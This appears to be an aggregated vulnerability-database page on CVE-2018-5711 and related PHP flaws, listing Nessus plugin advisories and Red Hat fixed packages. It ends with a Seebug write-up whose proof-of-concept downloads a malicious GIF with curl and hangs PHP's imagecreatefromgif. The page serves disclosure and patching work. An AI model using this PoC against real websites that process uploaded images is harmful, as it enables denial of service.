    sourcehttps://www.tenable.com/plugins/nessus/120264
    titleFedora 28 : gd (2018-1aeac808ce)
  • NASL familySuSE Local Security Checks
    NASL idSUSE_SU-2018-0806-1.NASL
    descriptionThis update for php53 fixes several issues. These security issues were fixed : - CVE-2016-10712: In PHP all of the return values of stream_get_meta_data could be controlled if the input can be controlled (e.g., during file uploads). (bsc#1080234) - CVE-2018-5712: Prevent reflected XSS on the PHAR 404 error page via the URI of a request for a .phar file that allowed for information disclosure (bsc#1076220) - CVE-2018-5711: Prevent integer signedness error that could have lead to an infinite loop via a crafted GIF file allowing for DoS (bsc#1076391) - CVE-2016-5773: php_zip.c in the zip extension in PHP improperly interacted with the unserialize implementation and garbage collection, which allowed remote attackers to execute arbitrary code or cause a denial of service (use-after-free and application crash) via crafted serialized data containing a ZipArchive object. (bsc#986247) - CVE-2016-5771: spl_array.c in the SPL extension in PHP improperly interacted with the unserialize implementation and garbage collection, which allowed remote attackers to execute arbitrary code or cause a denial of service (use-after-free and application crash) via crafted serialized data. (bsc#986391) - CVE-2018-7584: Fixed stack-based buffer under-read while parsing an HTTPresponse in the php_stream_url_wrap_http_ex. (bsc#1083639) Note that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
    last seen2020-06-01
    modified2020-06-02
    plugin id108650
    published2018-03-27
    reporterThis script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/108650
    titleSUSE SLES11 Security Update : php53 (SUSE-SU-2018:0806-1)
  • NASL familyUbuntu Local Security Checks
    NASL idUBUNTU_USN-3755-1.NASL
    descriptionIt was discovered that GD incorrectly handled certain images. An attacker could possibly use this issue to execute arbitrary code. (CVE-2018-1000222) It was discovered that GD incorrectly handled certain GIF files. An attacker could possibly use this issue to cause a denial of service. (CVE-2018-5711). Note that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
    last seen2020-06-01
    modified2020-06-02
    plugin id112150
    published2018-08-28
    reporterUbuntu Security Notice (C) 2018-2019 Canonical, Inc. / NASL script (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/112150
    titleUbuntu 14.04 LTS / 16.04 LTS / 18.04 LTS : libgd2 vulnerabilities (USN-3755-1)
  • NASL familyHuawei Local Security Checks
    NASL idEULEROS_SA-2019-1984.NASL
    descriptionAccording to the versions of the php packages installed, the EulerOS installation on the remote host is affected by the following vulnerabilities : - The get_icu_disp_value_src_php function in ext/intl/locale/locale_methods.c in PHP before 5.3.29, 5.4.x before 5.4.30, and 5.5.x before 5.5.14 does not properly restrict calls to the ICU uresbund.cpp component, which allows remote attackers to cause a denial of service (buffer overflow) or possibly have unspecified other impact via a locale_get_display_name call with a long first argument.(CVE-2014-9912) - Use-after-free vulnerability in the spl_ptr_heap_insert function in ext/spl/spl_heap.c in PHP before 5.5.27 and 5.6.x before 5.6.11 allows remote attackers to execute arbitrary code by triggering a failed SplMinHeap::compare operation.(CVE-2015-4116) - A flaw was found in the way the way PHP
    last seen2020-05-08
    modified2019-09-24
    plugin id129178
    published2019-09-24
    reporterThis script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/129178
    titleEulerOS 2.0 SP5 : php (EulerOS-SA-2019-1984)
  • NASL familySuSE Local Security Checks
    NASL idOPENSUSE-2018-99.NASL
    descriptionThis update for php5 fixes several issues. These security issues were fixed : - CVE-2018-5712: Prevent reflected XSS on the PHAR 404 error page via the URI of a request for a .phar file that allowed for information disclosure (bsc#1076220) - CVE-2018-5711: Prevent integer signedness error that could have lead to an infinite loop via a crafted GIF file allowing for DoS (bsc#1076391) This update was imported from the SUSE:SLE-12:Update update project.
    last seen2020-06-05
    modified2018-01-29
    plugin id106434
    published2018-01-29
    reporterThis script is Copyright (C) 2018-2020 Tenable Network Security, Inc.
    sourcehttps://www.tenable.com/plugins/nessus/106434
    titleopenSUSE Security Update : php5 (openSUSE-2018-99)
  • NASL familyAmazon Linux Local Security Checks
    NASL idALA_ALAS-2018-946.NASL
    descriptionReflected XSS in .phar 404 page An issue was discovered in PHP; there is Reflected XSS on the PHAR 404 error page via the URI of a request for a .phar file. (CVE-2018-5712) Denial of Service (DoS) via infinite loop in libgd gdImageCreateFromGifCtx function in ext/gd/libgd/gd_gif_in.c The gd_gif_in.c file in the GD Graphics Library (aka libgd), as used in PHP has an integer signedness error that leads to an infinite loop via a crafted GIF file, as demonstrated by a call to the imagecreatefromgif or imagecreatefromstring PHP function. This is related to GetCode_ and gdImageCreateFromGifCtx. (CVE-2018-5711)
    last seen2020-06-01
    modified2020-06-02
    plugin id106691
    published2018-02-09
    reporterThis script is Copyright (C) 2018 Tenable Network Security, Inc.
    sourcehttps://www.tenable.com/plugins/nessus/106691
    titleAmazon Linux AMI : php56 / php70,php71 (ALAS-2018-946)

Redhat

advisories
  • rhsa
    idRHSA-2018:1296
  • rhsa
    idRHSA-2019:2519
rpms
  • rh-php70-php-0:7.0.27-1.el6
  • rh-php70-php-0:7.0.27-1.el7
  • rh-php70-php-bcmath-0:7.0.27-1.el6
  • rh-php70-php-bcmath-0:7.0.27-1.el7
  • rh-php70-php-cli-0:7.0.27-1.el6
  • rh-php70-php-cli-0:7.0.27-1.el7
  • rh-php70-php-common-0:7.0.27-1.el6
  • rh-php70-php-common-0:7.0.27-1.el7
  • rh-php70-php-dba-0:7.0.27-1.el6
  • rh-php70-php-dba-0:7.0.27-1.el7
  • rh-php70-php-dbg-0:7.0.27-1.el6
  • rh-php70-php-dbg-0:7.0.27-1.el7
  • rh-php70-php-debuginfo-0:7.0.27-1.el6
  • rh-php70-php-debuginfo-0:7.0.27-1.el7
  • rh-php70-php-devel-0:7.0.27-1.el6
  • rh-php70-php-devel-0:7.0.27-1.el7
  • rh-php70-php-embedded-0:7.0.27-1.el6
  • rh-php70-php-embedded-0:7.0.27-1.el7
  • rh-php70-php-enchant-0:7.0.27-1.el6
  • rh-php70-php-enchant-0:7.0.27-1.el7
  • rh-php70-php-fpm-0:7.0.27-1.el6
  • rh-php70-php-fpm-0:7.0.27-1.el7
  • rh-php70-php-gd-0:7.0.27-1.el6
  • rh-php70-php-gd-0:7.0.27-1.el7
  • rh-php70-php-gmp-0:7.0.27-1.el6
  • rh-php70-php-gmp-0:7.0.27-1.el7
  • rh-php70-php-imap-0:7.0.27-1.el6
  • rh-php70-php-intl-0:7.0.27-1.el6
  • rh-php70-php-intl-0:7.0.27-1.el7
  • rh-php70-php-json-0:7.0.27-1.el6
  • rh-php70-php-json-0:7.0.27-1.el7
  • rh-php70-php-ldap-0:7.0.27-1.el6
  • rh-php70-php-ldap-0:7.0.27-1.el7
  • rh-php70-php-mbstring-0:7.0.27-1.el6
  • rh-php70-php-mbstring-0:7.0.27-1.el7
  • rh-php70-php-mysqlnd-0:7.0.27-1.el6
  • rh-php70-php-mysqlnd-0:7.0.27-1.el7
  • rh-php70-php-odbc-0:7.0.27-1.el6
  • rh-php70-php-odbc-0:7.0.27-1.el7
  • rh-php70-php-opcache-0:7.0.27-1.el6
  • rh-php70-php-opcache-0:7.0.27-1.el7
  • rh-php70-php-pdo-0:7.0.27-1.el6
  • rh-php70-php-pdo-0:7.0.27-1.el7
  • rh-php70-php-pgsql-0:7.0.27-1.el6
  • rh-php70-php-pgsql-0:7.0.27-1.el7
  • rh-php70-php-process-0:7.0.27-1.el6
  • rh-php70-php-process-0:7.0.27-1.el7
  • rh-php70-php-pspell-0:7.0.27-1.el6
  • rh-php70-php-pspell-0:7.0.27-1.el7
  • rh-php70-php-recode-0:7.0.27-1.el6
  • rh-php70-php-recode-0:7.0.27-1.el7
  • rh-php70-php-snmp-0:7.0.27-1.el6
  • rh-php70-php-snmp-0:7.0.27-1.el7
  • rh-php70-php-soap-0:7.0.27-1.el6
  • rh-php70-php-soap-0:7.0.27-1.el7
  • rh-php70-php-tidy-0:7.0.27-1.el6
  • rh-php70-php-xml-0:7.0.27-1.el6
  • rh-php70-php-xml-0:7.0.27-1.el7
  • rh-php70-php-xmlrpc-0:7.0.27-1.el6
  • rh-php70-php-xmlrpc-0:7.0.27-1.el7
  • rh-php70-php-zip-0:7.0.27-1.el6
  • rh-php70-php-zip-0:7.0.27-1.el7
  • rh-php71-php-0:7.1.30-1.el7
  • rh-php71-php-bcmath-0:7.1.30-1.el7
  • rh-php71-php-cli-0:7.1.30-1.el7
  • rh-php71-php-common-0:7.1.30-1.el7
  • rh-php71-php-dba-0:7.1.30-1.el7
  • rh-php71-php-dbg-0:7.1.30-1.el7
  • rh-php71-php-debuginfo-0:7.1.30-1.el7
  • rh-php71-php-devel-0:7.1.30-1.el7
  • rh-php71-php-embedded-0:7.1.30-1.el7
  • rh-php71-php-enchant-0:7.1.30-1.el7
  • rh-php71-php-fpm-0:7.1.30-1.el7
  • rh-php71-php-gd-0:7.1.30-1.el7
  • rh-php71-php-gmp-0:7.1.30-1.el7
  • rh-php71-php-intl-0:7.1.30-1.el7
  • rh-php71-php-json-0:7.1.30-1.el7
  • rh-php71-php-ldap-0:7.1.30-1.el7
  • rh-php71-php-mbstring-0:7.1.30-1.el7
  • rh-php71-php-mysqlnd-0:7.1.30-1.el7
  • rh-php71-php-odbc-0:7.1.30-1.el7
  • rh-php71-php-opcache-0:7.1.30-1.el7
  • rh-php71-php-pdo-0:7.1.30-1.el7
  • rh-php71-php-pgsql-0:7.1.30-1.el7
  • rh-php71-php-process-0:7.1.30-1.el7
  • rh-php71-php-pspell-0:7.1.30-1.el7
  • rh-php71-php-recode-0:7.1.30-1.el7
  • rh-php71-php-snmp-0:7.1.30-1.el7
  • rh-php71-php-soap-0:7.1.30-1.el7
  • rh-php71-php-xml-0:7.1.30-1.el7
  • rh-php71-php-xmlrpc-0:7.1.30-1.el7
  • rh-php71-php-zip-0:7.1.30-1.el7

Seebug

bulletinFamilyexploit
descriptionRecently, I reviewed several Web frameworks and language implementations, and found some vulnerabilities. This is an simple and interesting case, and seems easy to exploit in real world! ### Affected All PHP version * PHP 5 < 5.6.33 * PHP 7.0 < 7.0.27 * PHP 7.1 < 7.1.13 * PHP 7.2 < 7.2.1 ### Vulnerability Details The vulnerability is on the file [`ext/gd/libgd/gd_gif_in.c`](https://github.com/php/php-src/blob/c5767db441e4db2a1e07b5880129ad7ce0b25b6f/ext/gd/libgd/gd_gif_in.c) There is a while-loop in [`LWZReadByte`](https://github.com/php/php-src/blob/c5767db441e4db2a1e07b5880129ad7ce0b25b6f/ext/gd/libgd/gd_gif_in.c#L460) ``` 460 do { 461 sd->firstcode = sd->oldcode = 461 GetCode(fd, &sd->scd, sd->code_size, FALSE, ZeroDataBlockP); 463 } while (sd->firstcode == sd->clear_code); ``` Function `GetCode` is just a wrapper, and [`GetCode_`](https://github.com/php/php-src/blob/c5767db441e4db2a1e07b5880129ad7ce0b25b6f/ext/gd/libgd/gd_gif_in.c#L376) do the real stuff. ``` 376 static int 377 GetCode_(gdIOCtx *fd, CODE_STATIC_DATA *scd, int code_size, int flag, int *ZeroDataBlockP) 378 { 379 int i, j, ret; 380 unsigned char count; ... 399 if ((count = GetDataBlock(fd, &scd->buf[2], ZeroDataBlockP)) <= 0) 400 scd->done = TRUE; ... 405 } ``` `GetCode_` call [`GetDataBlock`](https://github.com/php/php-src/blob/c5767db441e4db2a1e07b5880129ad7ce0b25b6f/ext/gd/libgd/gd_gif_in.c#L333) to read data from GIF! ``` 332 static int 333 GetDataBlock_(gdIOCtx *fd, unsigned char *buf, int *ZeroDataBlockP) 334 { 335 unsigned char count; 336 336 if (! ReadOK(fd,&count,1)) { 338 return -1; 339 } 340 341 *ZeroDataBlockP = count == 0; 342 343 if ((count != 0) && (! ReadOK(fd, buf, count))) { 344 return -1; 345 } 346 347 return count; 348 } ``` OK, here are all vulnerable code, can you spot the vulnerability? :P The bug relied on the type conversion from int to `unsigned` char. As you can see: If `GetDataBlock_` return `-1`, `scd->done` in line 400 will set to True, and stop the while-loop. But it will never be executed because the definition of `count` is `unsigned char`, it’s always be a positive from 0 to 255. So the result is, one single GIF can make an infinite loop and exhausted the server resource. ### PoC ``` $ curl -L https://git.io/vN0n4 | xxd -r > poc.gif $ php -r 'imagecreatefromgif("poc.gif");' Infinite loop here... ``` It's easy to exploit in real world because lots of websites resize user-uploaded image by GD library...
idSSV:97122
last seen2018-02-03
modified2018-02-02
published2018-02-02
reporterRoot
sourcehttps://www.seebug.org/vuldb/ssvid-97122
titlePHP CVE-2018-5711 - Hanging Websites by a Harmful GIF